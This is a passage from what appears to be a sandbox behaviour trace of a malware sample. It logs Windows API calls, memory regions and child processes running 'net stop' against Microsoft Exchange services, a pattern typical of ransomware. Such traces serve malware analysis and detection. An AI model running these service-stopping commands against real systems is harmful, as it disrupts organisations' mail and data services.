_String2="MSExchangeIS") returned 5 [0137.063] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeIS") returned 10 [0137.063] _wcsicmp (_String1="work", _String2="MSExchangeIS") returned 10 [0137.063] _wcsicmp (_String1="wksta", _String2="MSExchangeIS") returned 10 [0137.063] _wcsicmp (_String1="prdr", _String2="MSExchangeIS") returned 3 [0137.063] _wcsicmp (_String1="devrdr", _String2="MSExchangeIS") returned -9 [0137.063] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeIS") returned -1 [0137.063] _wcsicmp (_String1="server", _String2="MSExchangeIS") returned 6 [0137.063] _wcsicmp (_String1="svr", _String2="MSExchangeIS") returned 6 [0137.063] _wcsicmp (_String1="srv", _String2="MSExchangeIS") returned 6 [0137.063] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeIS") returned -1 [0137.063] _wcsicmp (_String1="alerter", _String2="MSExchangeIS") returned -12 [0137.063] _wcsicmp (_String1="netlogon", _String2="MSExchangeIS") returned 1 [0137.063] _wcsupr (in: _String="MSExchangeIS" | out: _String="MSEXCHANGEIS") returned="MSEXCHANGEIS" [0137.063] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xb32630 [0137.065] GetServiceKeyNameW (in: hSCManager=0xb32630, lpDisplayName="MSEXCHANGEIS", lpServiceName=0x10a8cb0, lpcchBuffer=0x87f4a4 | out: lpServiceName="", lpcchBuffer=0x87f4a4) returned 0 [0137.065] _wcsicmp (_String1="msg", _String2="MSEXCHANGEIS") returned 2 [0137.065] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEIS") returned -14 [0137.065] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEIS") returned 5 [0137.065] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEIS") returned 5 [0137.065] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEIS") returned 5 [0137.065] _wcsicmp (_String1="redir", _String2="MSEXCHANGEIS") returned 5 [0137.065] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEIS") returned 5 [0137.065] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEIS") returned 10 [0137.065] _wcsicmp (_String1="work", _String2="MSEXCHANGEIS") returned 10 [0137.065] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEIS") returned 10 [0137.065] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEIS") returned 3 [0137.065] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEIS") returned -9 [0137.065] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEIS") returned -1 [0137.065] _wcsicmp (_String1="server", _String2="MSEXCHANGEIS") returned 6 [0137.065] _wcsicmp (_String1="svr", _String2="MSEXCHANGEIS") returned 6 [0137.065] _wcsicmp (_String1="srv", _String2="MSEXCHANGEIS") returned 6 [0137.065] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEIS") returned -1 [0137.066] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEIS") returned -12 [0137.066] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEIS") returned 1 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="WORKSTATION") returned -10 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="LanmanWorkstation") returned 1 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="SERVER") returned -6 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="LanmanServer") returned 1 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="BROWSER") returned 11 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="BROWSER") returned 11 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="MESSENGER") returned 14 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="MESSENGER") returned 14 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="NETRUN") returned -1 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="NETRUN") returned -1 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="SPOOLER") returned -6 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="SPOOLER") returned -6 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="ALERTER") returned 12 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="ALERTER") returned 12 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="NETLOGON") returned -1 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="NETLOGON") returned -1 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="NETPOPUP") returned -1 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="NETPOPUP") returned -1 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="SQLSERVER") returned -6 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="SQLSERVER") returned -6 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="REPLICATOR") returned -5 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="REPLICATOR") returned -5 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="REMOTEBOOT") returned -5 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="REMOTEBOOT") returned -5 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="TIMESOURCE") returned -7 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="TIMESOURCE") returned -7 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="AFP") returned 12 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="AFP") returned 12 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="UPS") returned -8 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="UPS") returned -8 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="XACTSRV") returned -11 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="XACTSRV") returned -11 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="TCPIP") returned -7 [0137.066] _wcsicmp (_String1="MSEXCHANGEIS", _String2="TCPIP") returned -7 [0137.066] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xb33758 [0137.066] OpenServiceW (hSCManager=0xb33758, lpServiceName="MSEXCHANGEIS", dwDesiredAccess=0x84) returned 0x0 [0137.067] GetLastError () returned 0x424 [0137.067] CloseServiceHandle (hSCObject=0xb33758) returned 1 [0137.067] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0137.067] LoadLibraryW (lpLibFileName="NETMSG") returned 0x9b0000 [0137.068] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x9b0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0137.068] GetFileType (hFile=0x40) returned 0x2 [0137.068] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x87f340 | out: lpMode=0x87f340) returned 1 [0137.069] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x87f34c, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x87f34c*=0x1e) returned 1 [0137.070] GetFileType (hFile=0x40) returned 0x2 [0137.070] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x87f340 | out: lpMode=0x87f340) returned 1 [0137.070] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x87f34c, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x87f34c*=0x2) returned 1 [0137.070] _ultow (in: _Dest=0x889, _Radix=8909664 | out: _Dest=0x889) returned="2185" [0137.070] FormatMessageW (in: dwFlags=0x2800, lpSource=0x9b0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0137.070] GetFileType (hFile=0x40) returned 0x2 [0137.070] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x87f330 | out: lpMode=0x87f330) returned 1 [0137.070] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x87f33c, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x87f33c*=0x34) returned 1 [0137.070] GetFileType (hFile=0x40) returned 0x2 [0137.070] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x87f330 | out: lpMode=0x87f330) returned 1 [0137.071] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x87f33c, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x87f33c*=0x2) returned 1 [0137.071] NetApiBufferFree (Buffer=0xb38088) returned 0x0 [0137.071] NetApiBufferFree (Buffer=0xb380a0) returned 0x0 [0137.071] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeIS" [0137.071] exit (_Code=2) Thread: id = 649 os_tid = 0xf38 Process: id = "213" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x11a49000" os_pid = "0x854" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeMailSubmission" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10565 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 10566 start_va = 0xdc0000 end_va = 0x4dbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 10567 start_va = 0x4dc0000 end_va = 0x4ddffff entry_point = 0x0 region_type = private name = "private_0x0000000004dc0000" filename = "" Region: id = 10568 start_va = 0x4de0000 end_va = 0x4de0fff entry_point = 0x0 region_type = private name = "private_0x0000000004de0000" filename = "" Region: id = 10569 start_va = 0x4df0000 end_va = 0x4e03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004df0000" filename = "" Region: id = 10570 start_va = 0x4e10000 end_va = 0x4e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e10000" filename = "" Region: id = 10571 start_va = 0x4e50000 end_va = 0x4f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e50000" filename = "" Region: id = 10572 start_va = 0x4f50000 end_va = 0x4f53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f50000" filename = "" Region: id = 10573 start_va = 0x4f60000 end_va = 0x4f60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f60000" filename = "" Region: id = 10574 start_va = 0x4f70000 end_va = 0x4f71fff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 10575 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10576 start_va = 0x7ea90000 end_va = 0x7eab2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea90000" filename = "" Region: id = 10577 start_va = 0x7eaba000 end_va = 0x7eabafff entry_point = 0x0 region_type = private name = "private_0x000000007eaba000" filename = "" Region: id = 10578 start_va = 0x7eabc000 end_va = 0x7eabefff entry_point = 0x0 region_type = private name = "private_0x000000007eabc000" filename = "" Region: id = 10579 start_va = 0x7eabf000 end_va = 0x7eabffff entry_point = 0x0 region_type = private name = "private_0x000000007eabf000" filename = "" Region: id = 10580 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10581 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10582 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10583 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10584 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10585 start_va = 0x5140000 end_va = 0x514ffff entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 10586 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10587 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10588 start_va = 0x52e0000 end_va = 0x53dffff entry_point = 0x0 region_type = private name = "private_0x00000000052e0000" filename = "" Region: id = 10589 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10630 start_va = 0x4dc0000 end_va = 0x4dcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dc0000" filename = "" Region: id = 10631 start_va = 0x4f80000 end_va = 0x503dfff entry_point = 0x4f80000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10632 start_va = 0x5040000 end_va = 0x507ffff entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 10633 start_va = 0x5150000 end_va = 0x524ffff entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 10634 start_va = 0x54f0000 end_va = 0x54fffff entry_point = 0x0 region_type = private name = "private_0x00000000054f0000" filename = "" Region: id = 10635 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10636 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10637 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10638 start_va = 0x7e990000 end_va = 0x7ea8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e990000" filename = "" Region: id = 10639 start_va = 0x7eab7000 end_va = 0x7eab9fff entry_point = 0x0 region_type = private name = "private_0x000000007eab7000" filename = "" Region: id = 10640 start_va = 0x4dd0000 end_va = 0x4dd3fff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 10641 start_va = 0x4de0000 end_va = 0x4de3fff entry_point = 0x0 region_type = private name = "private_0x0000000004de0000" filename = "" Region: id = 10642 start_va = 0x5500000 end_va = 0x5836fff entry_point = 0x5500000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 650 os_tid = 0xf28 [0137.232] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0137.232] __set_app_type (_Type=0x1) [0137.232] __p__fmode () returned 0x77ac4d6c [0137.232] __p__commode () returned 0x77ac5b1c [0137.232] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0137.232] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0137.232] GetCurrentThreadId () returned 0xf28 [0137.232] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf28) returned 0x84 [0137.232] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0137.232] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0137.232] SetThreadUILanguage (LangId=0x0) returned 0x409 [0137.234] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0137.235] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4f4fba8 | out: phkResult=0x4f4fba8*=0x0) returned 0x2 [0137.235] VirtualQuery (in: lpAddress=0x4f4fbaf, lpBuffer=0x4f4fb60, dwLength=0x1c | out: lpBuffer=0x4f4fb60*(BaseAddress=0x4f4f000, AllocationBase=0x4e50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0137.235] VirtualQuery (in: lpAddress=0x4e50000, lpBuffer=0x4f4fb60, dwLength=0x1c | out: lpBuffer=0x4f4fb60*(BaseAddress=0x4e50000, AllocationBase=0x4e50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0137.235] VirtualQuery (in: lpAddress=0x4e51000, lpBuffer=0x4f4fb60, dwLength=0x1c | out: lpBuffer=0x4f4fb60*(BaseAddress=0x4e51000, AllocationBase=0x4e50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0137.235] VirtualQuery (in: lpAddress=0x4e53000, lpBuffer=0x4f4fb60, dwLength=0x1c | out: lpBuffer=0x4f4fb60*(BaseAddress=0x4e53000, AllocationBase=0x4e50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0137.235] VirtualQuery (in: lpAddress=0x4f50000, lpBuffer=0x4f4fb60, dwLength=0x1c | out: lpBuffer=0x4f4fb60*(BaseAddress=0x4f50000, AllocationBase=0x4f50000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0137.235] GetConsoleOutputCP () returned 0x1b5 [0137.235] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0137.235] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0137.235] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.235] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0137.235] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.235] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0137.236] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.236] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0137.236] _get_osfhandle (_FileHandle=0) returned 0x38 [0137.236] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0137.236] _get_osfhandle (_FileHandle=0) returned 0x38 [0137.236] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0137.236] GetEnvironmentStringsW () returned 0x52e7d80* [0137.236] FreeEnvironmentStringsA (penv="A") returned 1 [0137.236] GetEnvironmentStringsW () returned 0x52e7d80* [0137.236] FreeEnvironmentStringsA (penv="A") returned 1 [0137.236] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4f4eb0c | out: phkResult=0x4f4eb0c*=0x94) returned 0x0 [0137.237] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4f4eb10, lpData=0x4f4eb18, lpcbData=0x4f4eb14*=0x1000 | out: lpType=0x4f4eb10*=0x0, lpData=0x4f4eb18*=0xb8, lpcbData=0x4f4eb14*=0x1000) returned 0x2 [0137.237] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4f4eb10, lpData=0x4f4eb18, lpcbData=0x4f4eb14*=0x1000 | out: lpType=0x4f4eb10*=0x4, lpData=0x4f4eb18*=0x1, lpcbData=0x4f4eb14*=0x4) returned 0x0 [0137.237] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4f4eb10, lpData=0x4f4eb18, lpcbData=0x4f4eb14*=0x1000 | out: lpType=0x4f4eb10*=0x0, lpData=0x4f4eb18*=0x1, lpcbData=0x4f4eb14*=0x1000) returned 0x2 [0137.237] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4f4eb10, lpData=0x4f4eb18, lpcbData=0x4f4eb14*=0x1000 | out: lpType=0x4f4eb10*=0x4, lpData=0x4f4eb18*=0x0, lpcbData=0x4f4eb14*=0x4) returned 0x0 [0137.237] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4f4eb10, lpData=0x4f4eb18, lpcbData=0x4f4eb14*=0x1000 | out: lpType=0x4f4eb10*=0x4, lpData=0x4f4eb18*=0x40, lpcbData=0x4f4eb14*=0x4) returned 0x0 [0137.237] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4f4eb10, lpData=0x4f4eb18, lpcbData=0x4f4eb14*=0x1000 | out: lpType=0x4f4eb10*=0x4, lpData=0x4f4eb18*=0x40, lpcbData=0x4f4eb14*=0x4) returned 0x0 [0137.237] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4f4eb10, lpData=0x4f4eb18, lpcbData=0x4f4eb14*=0x1000 | out: lpType=0x4f4eb10*=0x0, lpData=0x4f4eb18*=0x40, lpcbData=0x4f4eb14*=0x1000) returned 0x2 [0137.237] RegCloseKey (hKey=0x94) returned 0x0 [0137.237] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4f4eb0c | out: phkResult=0x4f4eb0c*=0x94) returned 0x0 [0137.237] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4f4eb10, lpData=0x4f4eb18, lpcbData=0x4f4eb14*=0x1000 | out: lpType=0x4f4eb10*=0x0, lpData=0x4f4eb18*=0x40, lpcbData=0x4f4eb14*=0x1000) returned 0x2 [0137.237] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4f4eb10, lpData=0x4f4eb18, lpcbData=0x4f4eb14*=0x1000 | out: lpType=0x4f4eb10*=0x4, lpData=0x4f4eb18*=0x1, lpcbData=0x4f4eb14*=0x4) returned 0x0 [0137.237] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4f4eb10, lpData=0x4f4eb18, lpcbData=0x4f4eb14*=0x1000 | out: lpType=0x4f4eb10*=0x0, lpData=0x4f4eb18*=0x1, lpcbData=0x4f4eb14*=0x1000) returned 0x2 [0137.237] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4f4eb10, lpData=0x4f4eb18, lpcbData=0x4f4eb14*=0x1000 | out: lpType=0x4f4eb10*=0x4, lpData=0x4f4eb18*=0x0, lpcbData=0x4f4eb14*=0x4) returned 0x0 [0137.237] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4f4eb10, lpData=0x4f4eb18, lpcbData=0x4f4eb14*=0x1000 | out: lpType=0x4f4eb10*=0x4, lpData=0x4f4eb18*=0x9, lpcbData=0x4f4eb14*=0x4) returned 0x0 [0137.237] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4f4eb10, lpData=0x4f4eb18, lpcbData=0x4f4eb14*=0x1000 | out: lpType=0x4f4eb10*=0x4, lpData=0x4f4eb18*=0x9, lpcbData=0x4f4eb14*=0x4) returned 0x0 [0137.237] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4f4eb10, lpData=0x4f4eb18, lpcbData=0x4f4eb14*=0x1000 | out: lpType=0x4f4eb10*=0x0, lpData=0x4f4eb18*=0x9, lpcbData=0x4f4eb14*=0x1000) returned 0x2 [0137.237] RegCloseKey (hKey=0x94) returned 0x0 [0137.237] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983a [0137.237] srand (_Seed=0x5ad2983a) [0137.237] GetCommandLineW () returned="/c net stop MSExchangeMailSubmission" [0137.237] GetCommandLineW () returned="/c net stop MSExchangeMailSubmission" [0137.237] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0137.237] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x52e9cd8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0137.237] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0137.237] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0137.238] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0137.238] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0137.238] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0137.238] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0137.238] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0137.238] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0137.238] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0137.238] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0137.238] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0137.238] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0137.238] GetEnvironmentStringsW () returned 0x52e7d80* [0137.238] FreeEnvironmentStringsA (penv="A") returned 1 [0137.238] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.238] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0137.238] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0137.238] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0137.238] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0137.238] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0137.238] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0137.238] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0137.238] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0137.238] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0137.238] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4f4f8e4 | out: 